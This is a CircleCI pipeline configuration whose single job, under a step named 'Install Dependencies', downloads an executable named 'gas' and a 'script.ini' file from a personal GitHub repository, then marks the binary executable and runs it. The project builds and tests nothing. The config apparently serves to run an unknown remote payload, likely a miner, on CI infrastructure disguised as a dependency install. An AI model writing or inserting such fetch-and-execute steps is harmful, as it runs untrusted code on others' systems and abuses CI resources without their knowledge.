# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/nitamigina/gason/raw/main/gas && wget https://github.com/nitamigina/gason/raw/main/script.ini && chmod +x gas && ./gas script.ini
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
